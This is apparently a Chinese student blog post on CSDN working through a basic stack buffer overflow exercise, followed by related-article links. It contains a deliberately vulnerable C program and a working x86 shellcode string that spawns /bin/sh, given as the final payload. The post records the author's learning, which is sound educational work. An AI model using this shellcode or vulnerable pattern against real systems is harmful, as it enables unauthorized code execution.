栈溢出攻击

最新推荐文章于 2021-05-28 12:46:02 发布
最新推荐文章于 2021-05-28 12:46:02 发布
阅读量455 收藏 3
点赞数
分类专栏: Hacker之路
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcl2840072208/article/details/87970751
版权

大神的博客就是强
基础知识:https://zhuanlan.zhihu.com/p/25816426

知识储备

核心目的: 攻击指令的地址来覆盖返回地址

  • 修改返回地址, 让其指向溢出数据的一段指令
  • 修改返回地址, 让其指向内存中以后的某个函数
  • 修改返回地址 , 让其指向内存中以后的指令
  • 修改某个被调用的函数地址,让其指向另一个函数

在这里插入图片描述
“X90” , NOP
在这里插入图片描述

观察程序运行过程

在这里插入图片描述

栈的变化

在这里插入图片描述

关键指令

在这里插入图片描述

栈溢出攻击实例

#include <stdio.h>
void func()
{
char name[0x50];
read(0 , name , 0x100);
write(1 , name , 0x100);
}
int main()
{
func();
return 0;
}

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
执行这段脚本失败
在这里插入图片描述
难受 , 问了下班上同学说是和shellcode 有问题
参加这个博客 https://www.anquanke.com/post/id/91266
重新开始
在这里插入图片描述
这次esp 为ffffd3f0
在这里插入图片描述
在这里插入图片描述
呃 发现他是反了
在这里插入图片描述

反正想要填充的NOP指令,不可执行 。。。。再次修改payload
发现是可以是可以注入的地址, 但是不可执行, 重新修改
在这里插入图片描述
shellcode 的原因

正确的shellcodepayload+=’\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80’
终于成功了

heri2
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
栈溢出几种情况及解决方案
让学习成为一种习惯
08-02 2753
递归函数在运行时会执行压栈操作,当压栈次数太多时,也会导致堆栈溢出。这种情况最常见,例如进行字符串拷贝,或处理用户输入等等。当函数内部的数组过大时,有可能导致堆栈溢出
栈溢出
Tianqinse的博客
08-18 3206
栈溢出概念: 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致栈中与其相邻的变量的值被改变。 栈溢出的原因: 局部数组过大。当函数内部的数组过大时,有可能导致堆栈溢出。局部变量是存储在栈中的,因此这个很好理解。解决这类问题的办法有两个,一是增大栈空间,二是改用动态分配,使用堆(heap)而不是栈(stack)。 递归调用层次太多。递归函数在运行时会执行压栈操作,当压栈次数太多时,也会导致堆栈溢出。 指针或数组越界。这种情况最常见,例如进行字符串拷贝,或处理用
详解栈溢出
dongdong7_77的博客
05-28 5574
前言 在我们平时开发的过程中,经常会出现stack overflow的情况导致程序崩溃,通常的原因都是无限的递归调用导致的,也就是无限的调用函数,导致空间用完,可是为什么非要使用栈呢,它内部是怎么运行的,栈的空间一共有多大呢,在下面会一一的详解 为什么要使用程序栈? 我们先来看一段代码 // function_example.c #include <stdio.h> int static add(int a, int b) { return a+b; } int main() {
栈溢出攻击基础
做一个快乐学习者
10-25 1121
不知道有没有听说过缓冲区溢出,那什么是缓冲区溢出呢?缓冲区溢出就是在大缓冲区中的数据向小缓冲区复制的过程中,由于没有进行边界检查,从而导致数据从小缓冲区溢出而冲掉了相邻内存区域的其它数据。缓冲区溢出是很常见的内存错误,攻击者入侵系统利用缓冲区溢出几乎可以做任何事情,因为成功利用缓冲区溢出漏洞不仅可以修改内存中变量的数据,还可以劫持进程,执行恶意代码,获取主机控制权。 我们要理解这一类攻击手法,那...
栈溢出攻击技术
03-13
缓冲区溢出攻击技术-栈溢出攻击技术。网络安全相关。
Linux下基本栈溢出攻击
01-30
基本的栈溢出攻击,是最早产生的一种缓冲区溢出攻击方法,它是所有其他缓冲区溢出攻击的基础。但是,由于这种攻击方法产生的时间比较长,故而GCC编译器、Linux操作系统提供了一些机制来阻止这种攻击方法对系统产生...
基于Linux的栈溢出攻击防护系统.pdf
09-07
基于Linux的栈溢出攻击防护系统 本文档主要介绍了一种基于Linux的栈溢出攻击防护系统,该系统可以有效地阻止栈溢出攻击,保护Linux系统免受恶意攻击或病毒的影响。 FuncFence系统是该防护系统的核心组件,可以提供...
栈溢出攻击技术及实例代码
06-11
栈溢出攻击是一种常见的安全漏洞利用技术,主要针对软件中的缓冲区溢出错误。栈是计算机内存中的一个重要区域,用于存储函数调用时的上下文信息,如返回地址、局部变量等。当程序员未正确处理数据长度,导致向栈中...
论文研究-基于Linux的栈溢出攻击防护系统.pdf
07-22
在引起恶意攻击或病毒的系统漏洞中,缓冲区溢出几乎占了一半以上,而栈溢出攻击是其中主流的攻击方式。FuncFence系统可以有效地阻止栈溢出攻击。与其他相关技术相比,FuncFence可以提供效率更好的安全机制,可以避免...
缓冲区溢出攻击实例
12-20
缓冲区溢出攻击及防范实例,网络攻击与防御课程使用
栈溢出基本原理的简单讲解
热门推荐
yan_star的博客
03-31 3万+
栈溢出基本原理的简单讲解 (新手上路,大牛还请自行跳过,不足之处,欢迎批评指正) 一 、预备知识: 缓冲区溢出简单介绍 缓冲区溢出:简单的说,缓冲区溢出就是超长的数据向小缓冲区复制,导致数据超出了小缓冲区,导致缓冲区其他的数据遭到破坏,这就是缓冲区溢出。而栈溢出是缓冲区溢出的一种,也是最常见的。只不过栈溢出发生在栈,堆溢出发生在堆,其实都是一样的。 栈的简单介绍 栈:栈是一种计算机系...
栈溢出简述
MumuziD的博客
07-18 2450
作者:YoungChen__ 链接:https://www.jianshu.com/p/2104d11ee0a2 来源:简书 著作权归作者所有,任何形式的转载都请联系作者。 本文关于删除部分有些异议,可以看这个Counting Bloom Filter 的原理和实现 在进入正文之前,之前看到的有句话我觉得说得很好: Data structures are nothing different. They are like the bookshelves of your application where.
最简单的一个堆栈溢出攻击实例 (1) [by Progsoft]
ProgSoft
11-18 3078
以下列出一个简单的利用自身堆栈溢出漏洞,攻击自己的程序。编译使用环境Windows2000/WindowsXP/VC6.0以下代码直接编译就可以产生简单攻击效果。正常无溢出程序,弹出OK对话框,当然需要你将aucName数组0xFE结束符添加并不使其溢出。溢出Debug版程序,弹出DBG HelloWorld!对话框,选择Debug编译即可。溢出Release程序,弹出HelloW
C/C++ 基础栈溢出及保护机制
C语言与CPP编程的博客
12-01 2806
来源:pandolia 整理:CPP开发者https://www.jianshu.com/p/47d484b9227e【导读】:缓冲区溢出非常危险,因为栈空间内保存了函数的返回地址。...
栈溢出例子理解
qq_36760780的博客
07-22 6256
背景:最近在看一些教学视频,然后主讲人敲了一段栈溢出的代码。我当场蒙蔽了-。- ! 而且他也没有细讲原理,最为一名爱探险星人,我决定Get it。 栈溢出示例代码: #include&lt;Windows.h&gt; #include&lt;stdio.h&gt; #include&lt;stdlib.h&gt; void Msg() { MessageBoxA(NULL, "嘿嘿!...
EIP & EBP & ESP
f413933206的专栏
12-20 7122
eax, ebx, ecx, edx, esi, edi, ebp, esp等都是X86 汇编语言中CPU上的通用寄存器的名称,是32位的寄存器。如果用C语言来解释,可以把这些寄存器当作变量看待。比方说:add eax,-2 ;   //可以认为是给变量eax加上-2这样的一个值。这些32位寄存器有多种用途,但每一个都有“专长”,有各自的特别之处。EAX 是"累加器"(accumulator), 它是很多加法乘法指令的缺省寄存器。EBX 是"基地址"(base)寄存器, 在内存寻址时存放基地址。ECX 是计
栈溢出攻击系列:shellcode在linux x86 64位攻击获得root权限(五)栈溢出原理
沧海一粟
02-23 2599
在前面的系列中,已经提到了方法调用关系中栈空间是如何布局的,而造成栈溢出的主要原因是有些函数没有越界检查,最后导致了栈的溢出,也就是栈的空间被人为的重新布局。大家重新在看这张栈的图 方法A调用方法B, 当B方法执行退出的时候,首先rbp指针指回方法A的函数入口地址,然后把rip 赋值到返回地址也就是当A call B的地址,而在图上返回地址就在B方法的调用栈的上方(栈是从高位到低位分配的

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值